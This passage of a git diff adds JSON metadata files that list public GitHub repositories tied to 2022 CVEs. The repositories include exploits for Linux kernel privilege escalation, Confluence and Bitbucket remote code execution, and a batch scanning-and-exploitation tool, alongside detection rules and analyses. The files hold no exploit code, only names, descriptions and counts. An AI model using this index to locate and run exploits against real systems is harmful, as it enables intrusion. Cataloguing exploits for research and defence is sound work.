+ "id": 604742294, + "name": "PDFkit-CMD-Injection", + "full_name": "lekosbelas\/PDFkit-CMD-Injection", + "owner": { + "login": "lekosbelas", + "id": 35641898, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35641898?v=4", + "html_url": "https:\/\/github.com\/lekosbelas", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lekosbelas\/PDFkit-CMD-Injection", + "description": "CVE-2022-25765 pdfkit 0.8.6 command injection.", + "fork": false, + "created_at": "2023-02-21T17:38:51Z", + "updated_at": "2023-03-04T10:34:21Z", + "pushed_at": "2023-02-22T11:55:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "2022", + "25765", + "cmd", + "command", + "cve", + "exploit", + "injection", + "pdfkit", + "rce" + ], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 746721441, + "name": "CVE-2022-25765", + "full_name": "lowercasenumbers\/CVE-2022-25765", + "owner": { + "login": "lowercasenumbers", + "id": 95596630, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/95596630?v=4", + "html_url": "https:\/\/github.com\/lowercasenumbers", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lowercasenumbers\/CVE-2022-25765", + "description": "Exploit for CVE-2022-25765", + "fork": false, + "created_at": "2024-01-22T14:45:34Z", + "updated_at": "2024-01-22T14:49:17Z", + "pushed_at": "2024-01-22T22:43:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-25813.json b/2022/CVE-2022-25813.json new file mode 100644 index 0000000000..1049a04b04 --- /dev/null +++ b/2022/CVE-2022-25813.json @@ -0,0 +1,41 @@ +[ + { + "id": 732790883, + "name": "CVE-2022-25813", + "full_name": "mbadanoiu\/CVE-2022-25813", + "owner": { + "login": "mbadanoiu", + "id": 18383407, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18383407?v=4", + "html_url": "https:\/\/github.com\/mbadanoiu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mbadanoiu\/CVE-2022-25813", + "description": "CVE-2022-25813: FreeMarker Server-Side Template Injection in Apache OfBiz ", + "fork": false, + "created_at": "2023-12-17T20:43:26Z", + "updated_at": "2023-12-17T20:56:52Z", + "pushed_at": "2023-12-17T20:54:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0-day", + "cve", + "cve-2022-25813", + "cves", + "remote-code-execution", + "server-side-template-injection", + "user-interaction" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-25845.json b/2022/CVE-2022-25845.json new file mode 100644 index 0000000000..58b77ce842 --- /dev/null +++ b/2022/CVE-2022-25845.json @@ -0,0 +1,157 @@ +[ + { + "id": 531364227, + "name": "FastjsonVulns", + "full_name": "hosch3n\/FastjsonVulns", + "owner": { + "login": "hosch3n", + "id": 29953808, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29953808?v=4", + "html_url": "https:\/\/github.com\/hosch3n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hosch3n\/FastjsonVulns", + "description": "[fastjson 1.2.80] CVE-2022-25845 aspectj fileread & groovy remote classload", + "fork": false, + "created_at": "2022-09-01T04:36:50Z", + "updated_at": "2024-11-28T09:29:42Z", + "pushed_at": "2022-09-02T11:00:28Z", + "stargazers_count": 91, + "watchers_count": 91, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 91, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 608248647, + "name": "CVE-2022-25845-exploit", + "full_name": "nerowander\/CVE-2022-25845-exploit", + "owner": { + "login": "nerowander", + "id": 98097702, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98097702?v=4", + "html_url": "https:\/\/github.com\/nerowander", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nerowander\/CVE-2022-25845-exploit", + "description": null, + "fork": false, + "created_at": "2023-03-01T16:17:08Z", + "updated_at": "2023-12-11T10:32:55Z", + "pushed_at": "2023-03-01T16:28:40Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 749518886, + "name": "fastjson-tp1fn1", + "full_name": "scabench\/fastjson-tp1fn1", + "owner": { + "login": "scabench", + "id": 154115874, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/154115874?v=4", + "html_url": "https:\/\/github.com\/scabench", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/scabench\/fastjson-tp1fn1", + "description": "a scenario based on CVE-2022-25845 yielding a TP for metadata based SCA but a FN if the callgraph is used", + "fork": false, + "created_at": "2024-01-28T20:03:23Z", + "updated_at": "2024-01-29T20:01:15Z", + "pushed_at": "2024-01-29T20:16:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 884824446, + "name": "CVE-2022-25845-In-Spring", + "full_name": "luelueking\/CVE-2022-25845-In-Spring", + "owner": { + "login": "luelueking", + "id": 93204032, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93204032?v=4", + "html_url": "https:\/\/github.com\/luelueking", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/luelueking\/CVE-2022-25845-In-Spring", + "description": "CVE-2022-25845(fastjson1.2.80) exploit in Spring Env!", + "fork": false, + "created_at": "2024-11-07T13:06:44Z", + "updated_at": "2024-11-25T02:35:44Z", + "pushed_at": "2024-11-07T13:38:18Z", + "stargazers_count": 71, + "watchers_count": 71, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 71, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 894494079, + "name": "CVE-2022-25845-In-Spring", + "full_name": "ph0ebus\/CVE-2022-25845-In-Spring", + "owner": { + "login": "ph0ebus", + "id": 108201283, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108201283?v=4", + "html_url": "https:\/\/github.com\/ph0ebus", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ph0ebus\/CVE-2022-25845-In-Spring", + "description": "exploit by python", + "fork": false, + "created_at": "2024-11-26T13:03:38Z", + "updated_at": "2024-11-26T13:03:42Z", + "pushed_at": "2024-11-26T13:03:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-2586.json b/2022/CVE-2022-2586.json new file mode 100644 index 0000000000..3332b2f176 --- /dev/null +++ b/2022/CVE-2022-2586.json @@ -0,0 +1,64 @@ +[ + { + "id": 532350223, + "name": "CVE-2022-2586-LPE", + "full_name": "aels\/CVE-2022-2586-LPE", + "owner": { + "login": "aels", + "id": 1212294, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1212294?v=4", + "html_url": "https:\/\/github.com\/aels", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aels\/CVE-2022-2586-LPE", + "description": "CVE-2022-2586: Linux kernel nft_object UAF", + "fork": false, + "created_at": "2022-09-03T19:04:31Z", + "updated_at": "2024-06-21T11:42:19Z", + "pushed_at": "2022-09-03T19:06:45Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 16, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 562389091, + "name": "CVE-2022-2586", + "full_name": "sniper404ghostxploit\/CVE-2022-2586", + "owner": { + "login": "sniper404ghostxploit", + "id": 115604134, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/115604134?v=4", + "html_url": "https:\/\/github.com\/sniper404ghostxploit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sniper404ghostxploit\/CVE-2022-2586", + "description": "gcc exploit.c -o exploit -lmnl -lnftnl -no-pie -lpthread", + "fork": false, + "created_at": "2022-11-06T07:34:32Z", + "updated_at": "2024-08-19T14:03:04Z", + "pushed_at": "2022-11-06T07:35:19Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-2588.json b/2022/CVE-2022-2588.json new file mode 100644 index 0000000000..ab08841be0 --- /dev/null +++ b/2022/CVE-2022-2588.json @@ -0,0 +1,250 @@ +[ + { + "id": 523603879, + "name": "CVE-2022-2588", + "full_name": "Markakd\/CVE-2022-2588", + "owner": { + "login": "Markakd", + "id": 18663141, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18663141?v=4", + "html_url": "https:\/\/github.com\/Markakd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Markakd\/CVE-2022-2588", + "description": "exploit for CVE-2022-2588", + "fork": false, + "created_at": "2022-08-11T06:01:24Z", + "updated_at": "2024-11-25T01:42:23Z", + "pushed_at": "2023-03-04T05:52:28Z", + "stargazers_count": 468, + "watchers_count": 468, + "has_discussions": false, + "forks_count": 68, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 68, + "watchers": 468, + "score": 0, + "subscribers_count": 49 + }, + { + "id": 527766502, + "name": "2022-LPE-UAF", + "full_name": "ASkyeye\/2022-LPE-UAF", + "owner": { + "login": "ASkyeye", + "id": 50972716, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50972716?v=4", + "html_url": "https:\/\/github.com\/ASkyeye", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ASkyeye\/2022-LPE-UAF", + "description": "CVE-2022-2588", + "fork": false, + "created_at": "2022-08-22T23:42:00Z", + "updated_at": "2022-08-24T08:36:08Z", + "pushed_at": "2022-08-22T23:16:05Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 528001549, + "name": "2022-LPE-UAF", + "full_name": "pirenga\/2022-LPE-UAF", + "owner": { + "login": "pirenga", + "id": 10979104, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10979104?v=4", + "html_url": "https:\/\/github.com\/pirenga", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pirenga\/2022-LPE-UAF", + "description": "CVE-2022-2588,CVE-2022-2586,CVE-2022-2585 ", + "fork": false, + "created_at": "2022-08-23T13:23:29Z", + "updated_at": "2024-08-12T20:26:26Z", + "pushed_at": "2022-08-23T10:47:36Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 528234354, + "name": "2022-LPE-UAF", + "full_name": "konoha279\/2022-LPE-UAF", + "owner": { + "login": "konoha279", + "id": 51186443, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51186443?v=4", + "html_url": "https:\/\/github.com\/konoha279", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/konoha279\/2022-LPE-UAF", + "description": "CVE-2022-2588,CVE-2022-2586,CVE-2022-2585 ", + "fork": false, + "created_at": "2022-08-24T02:20:35Z", + "updated_at": "2023-09-14T20:04:34Z", + "pushed_at": "2022-08-23T23:33:36Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 4, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 538247197, + "name": "CVE-2022-2588", + "full_name": "snackbauer\/CVE-2022-2588", + "owner": { + "login": "snackbauer", + "id": 46855517, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46855517?v=4", + "html_url": "https:\/\/github.com\/snackbauer", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/snackbauer\/CVE-2022-2588", + "description": "A PoC for CVE-2022-2588 that triggers a WARNING", + "fork": false, + "created_at": "2022-09-18T21:35:19Z", + "updated_at": "2024-08-12T20:27:09Z", + "pushed_at": "2022-09-28T22:33:17Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 10, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 574255247, + "name": "CVE-2022-2588", + "full_name": "BassamGraini\/CVE-2022-2588", + "owner": { + "login": "BassamGraini", + "id": 71853669, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71853669?v=4", + "html_url": "https:\/\/github.com\/BassamGraini", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BassamGraini\/CVE-2022-2588", + "description": null, + "fork": false, + "created_at": "2022-12-04T22:10:57Z", + "updated_at": "2024-10-21T03:18:10Z", + "pushed_at": "2022-12-16T01:03:41Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 12, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 608527042, + "name": "CVE-2022-2588", + "full_name": "veritas501\/CVE-2022-2588", + "owner": { + "login": "veritas501", + "id": 25763545, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25763545?v=4", + "html_url": "https:\/\/github.com\/veritas501", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/veritas501\/CVE-2022-2588", + "description": "CVE-2022-2588", + "fork": false, + "created_at": "2023-03-02T07:45:22Z", + "updated_at": "2024-04-02T17:41:00Z", + "pushed_at": "2023-08-22T11:19:28Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 611941666, + "name": "CVE-2022-2588", + "full_name": "dom4570\/CVE-2022-2588", + "owner": { + "login": "dom4570", + "id": 70895650, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70895650?v=4", + "html_url": "https:\/\/github.com\/dom4570", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dom4570\/CVE-2022-2588", + "description": null, + "fork": false, + "created_at": "2023-03-09T21:29:56Z", + "updated_at": "2023-03-09T21:30:56Z", + "pushed_at": "2023-03-09T21:30:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-2590.json b/2022/CVE-2022-2590.json new file mode 100644 index 0000000000..41cd510ca0 --- /dev/null +++ b/2022/CVE-2022-2590.json @@ -0,0 +1,47 @@ +[ + { + "id": 835827416, + "name": "CVE-2022-2590-analysis", + "full_name": "hyeonjun17\/CVE-2022-2590-analysis", + "owner": { + "login": "hyeonjun17", + "id": 69148883, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69148883?v=4", + "html_url": "https:\/\/github.com\/hyeonjun17", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hyeonjun17\/CVE-2022-2590-analysis", + "description": "Dirty COW restricted to shmem in linux kernel", + "fork": false, + "created_at": "2024-07-30T15:54:07Z", + "updated_at": "2024-07-31T07:03:57Z", + "pushed_at": "2024-07-30T17:31:48Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "1-day", + "analysis", + "cve-2022-2590", + "dirty-cow", + "exploit", + "linux", + "linux-kernel", + "memory-management", + "race-condition", + "security", + "shared-memory", + "userfaultfd", + "vulnerability" + ], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-25927.json b/2022/CVE-2022-25927.json new file mode 100644 index 0000000000..3febb14644 --- /dev/null +++ b/2022/CVE-2022-25927.json @@ -0,0 +1,33 @@ +[ + { + "id": 595917273, + "name": "cve-2022-25927", + "full_name": "masahiro331\/cve-2022-25927", + "owner": { + "login": "masahiro331", + "id": 20438853, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20438853?v=4", + "html_url": "https:\/\/github.com\/masahiro331", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/masahiro331\/cve-2022-25927", + "description": null, + "fork": false, + "created_at": "2023-02-01T04:16:47Z", + "updated_at": "2023-02-01T04:18:02Z", + "pushed_at": "2023-02-01T04:17:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-25943.json b/2022/CVE-2022-25943.json new file mode 100644 index 0000000000..5b6cb902ff --- /dev/null +++ b/2022/CVE-2022-25943.json @@ -0,0 +1,64 @@ +[ + { + "id": 384572220, + "name": "KINGSOFT-WPS-Office-LPE", + "full_name": "HadiMed\/KINGSOFT-WPS-Office-LPE", + "owner": { + "login": "HadiMed", + "id": 57273771, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57273771?v=4", + "html_url": "https:\/\/github.com\/HadiMed", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HadiMed\/KINGSOFT-WPS-Office-LPE", + "description": "CVE-2022-25943", + "fork": false, + "created_at": "2021-07-09T23:34:57Z", + "updated_at": "2024-11-02T17:34:01Z", + "pushed_at": "2022-03-09T08:26:45Z", + "stargazers_count": 59, + "watchers_count": 59, + "has_discussions": false, + "forks_count": 15, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 15, + "watchers": 59, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 484356389, + "name": "CVE-2022-25943", + "full_name": "webraybtl\/CVE-2022-25943", + "owner": { + "login": "webraybtl", + "id": 95903558, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/95903558?v=4", + "html_url": "https:\/\/github.com\/webraybtl", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/webraybtl\/CVE-2022-25943", + "description": "CVE-2022-25943", + "fork": false, + "created_at": "2022-04-22T08:30:55Z", + "updated_at": "2024-08-12T20:22:39Z", + "pushed_at": "2023-07-06T06:38:51Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-25949.json b/2022/CVE-2022-25949.json new file mode 100644 index 0000000000..352df9f380 --- /dev/null +++ b/2022/CVE-2022-25949.json @@ -0,0 +1,33 @@ +[ + { + "id": 470624137, + "name": "CVE-2022-25949", + "full_name": "tandasat\/CVE-2022-25949", + "owner": { + "login": "tandasat", + "id": 1620923, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1620923?v=4", + "html_url": "https:\/\/github.com\/tandasat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tandasat\/CVE-2022-25949", + "description": "A years-old exploit of a local EoP vulnerability in Kingsoft Antivirus KWatch Driver version 2009.3.17.77.", + "fork": false, + "created_at": "2022-03-16T14:42:21Z", + "updated_at": "2024-10-05T16:19:51Z", + "pushed_at": "2022-03-16T19:51:30Z", + "stargazers_count": 36, + "watchers_count": 36, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 36, + "score": 0, + "subscribers_count": 5 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-2602.json b/2022/CVE-2022-2602.json new file mode 100644 index 0000000000..d7c2a67620 --- /dev/null +++ b/2022/CVE-2022-2602.json @@ -0,0 +1,95 @@ +[ + { + "id": 567860169, + "name": "CVE-2022-2602", + "full_name": "LukeGix\/CVE-2022-2602", + "owner": { + "login": "LukeGix", + "id": 80392368, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80392368?v=4", + "html_url": "https:\/\/github.com\/LukeGix", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LukeGix\/CVE-2022-2602", + "description": "CVE-2022-2602", + "fork": false, + "created_at": "2022-11-18T18:53:27Z", + "updated_at": "2024-05-10T10:47:50Z", + "pushed_at": "2022-12-22T11:21:11Z", + "stargazers_count": 88, + "watchers_count": 88, + "has_discussions": false, + "forks_count": 22, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 22, + "watchers": 88, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 580378653, + "name": "CVE-2022-2602-Kernel-Exploit", + "full_name": "kiks7\/CVE-2022-2602-Kernel-Exploit", + "owner": { + "login": "kiks7", + "id": 41572858, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41572858?v=4", + "html_url": "https:\/\/github.com\/kiks7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kiks7\/CVE-2022-2602-Kernel-Exploit", + "description": null, + "fork": false, + "created_at": "2022-12-20T12:16:38Z", + "updated_at": "2024-09-25T15:06:42Z", + "pushed_at": "2023-01-09T11:28:00Z", + "stargazers_count": 86, + "watchers_count": 86, + "has_discussions": false, + "forks_count": 28, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 28, + "watchers": 86, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 586887875, + "name": "CVE-2022-2602-Study", + "full_name": "th3-5had0w\/CVE-2022-2602-Study", + "owner": { + "login": "th3-5had0w", + "id": 46859830, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46859830?v=4", + "html_url": "https:\/\/github.com\/th3-5had0w", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/th3-5had0w\/CVE-2022-2602-Study", + "description": null, + "fork": false, + "created_at": "2023-01-09T13:21:02Z", + "updated_at": "2023-05-20T05:45:42Z", + "pushed_at": "2023-01-09T13:22:54Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-26133.json b/2022/CVE-2022-26133.json new file mode 100644 index 0000000000..fb094998ee --- /dev/null +++ b/2022/CVE-2022-26133.json @@ -0,0 +1,70 @@ +[ + { + "id": 490266416, + "name": "CVE-2022-26133", + "full_name": "Pear1y\/CVE-2022-26133", + "owner": { + "login": "Pear1y", + "id": 47770089, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47770089?v=4", + "html_url": "https:\/\/github.com\/Pear1y", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Pear1y\/CVE-2022-26133", + "description": "Atlassian Bitbucket Data Center RCE(CVE-2022-26133) verification.", + "fork": false, + "created_at": "2022-05-09T12:07:51Z", + "updated_at": "2024-11-21T14:25:50Z", + "pushed_at": "2022-05-11T02:02:59Z", + "stargazers_count": 147, + "watchers_count": 147, + "has_discussions": false, + "forks_count": 38, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-26133" + ], + "visibility": "public", + "forks": 38, + "watchers": 147, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 499807251, + "name": "CVE-2022-26133", + "full_name": "0xAbbarhSF\/CVE-2022-26133", + "owner": { + "login": "0xAbbarhSF", + "id": 67552744, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67552744?v=4", + "html_url": "https:\/\/github.com\/0xAbbarhSF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xAbbarhSF\/CVE-2022-26133", + "description": "CVE-2022-26133 Exploit ", + "fork": false, + "created_at": "2022-06-04T11:31:48Z", + "updated_at": "2023-09-28T11:39:24Z", + "pushed_at": "2022-06-04T20:55:09Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2022-26133", + "exploitation" + ], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-26134.json b/2022/CVE-2022-26134.json new file mode 100644 index 0000000000..3616221bb6 --- /dev/null +++ b/2022/CVE-2022-26134.json @@ -0,0 +1,2166 @@ +[ + { + "id": 498236325, + "name": "Serein", + "full_name": "W01fh4cker\/Serein", + "owner": { + "login": "W01fh4cker", + "id": 101872898, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101872898?v=4", + "html_url": "https:\/\/github.com\/W01fh4cker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/W01fh4cker\/Serein", + "description": "【懒人神器】一款图形化、批量采集url、批量对采集的url进行各种nday检测的工具。可用于src挖掘、cnvd挖掘、0day利用、打造自己的武器库等场景。可以批量利用Actively Exploited Atlassian Confluence 0Day CVE-2022-26134和DedeCMS v5.7.87 SQL注入 CVE-2022-23337。", + "fork": false, + "created_at": "2022-05-31T07:44:01Z", + "updated_at": "2024-11-27T03:17:31Z", + "pushed_at": "2023-02-26T14:06:05Z", + "stargazers_count": 1171, + "watchers_count": 1171, + "has_discussions": true, + "forks_count": 190, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0day", + "batch", + "cve-2018-13379", + "cve-2019-5418", + "cve-2021-30461", + "cve-2021-34473", + "cve-2021-43734", + "cve-2022-1119", + "cve-2022-22954", + "cve-2022-22980", + "cve-2022-23337", + "cve-2022-25078", + "cve-2022-26134", + "cve-2022-29303", + "cve-2022-29464", + "cve-2022-30525", + "cve-2022-33891", + "cve-2022-8515", + "gui" + ], + "visibility": "public", + "forks": 190, + "watchers": 1171, + "score": 0, + "subscribers_count": 19 + }, + { + "id": 499428815, + "name": "CVE-2022-26134", + "full_name": "offlinehoster\/CVE-2022-26134", + "owner": { + "login": "offlinehoster", + "id": 1618359, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1618359?v=4", + "html_url": "https:\/\/github.com\/offlinehoster", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/offlinehoster\/CVE-2022-26134", + "description": "Information and scripts for the confluence CVE-2022-26134", + "fork": false, + "created_at": "2022-06-03T08:01:49Z", + "updated_at": "2022-06-14T18:47:54Z", + "pushed_at": "2022-06-03T10:12:19Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 8, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 499529713, + "name": "CVE-2022-26134-Exploit-Detection", + "full_name": "ma1am\/CVE-2022-26134-Exploit-Detection", + "owner": { + "login": "ma1am", + "id": 32792786, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32792786?v=4", + "html_url": "https:\/\/github.com\/ma1am", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ma1am\/CVE-2022-26134-Exploit-Detection", + "description": "This repository contains Yara rule and the method that a security investigator may want to use for CVE-2022-26134 threat hunting on their Linux confluence servers.", + "fork": false, + "created_at": "2022-06-03T13:52:14Z", + "updated_at": "2022-06-07T09:11:48Z", + "pushed_at": "2022-06-06T19:37:27Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": true, + "forks_count": 0, + "allow_forking": true, + 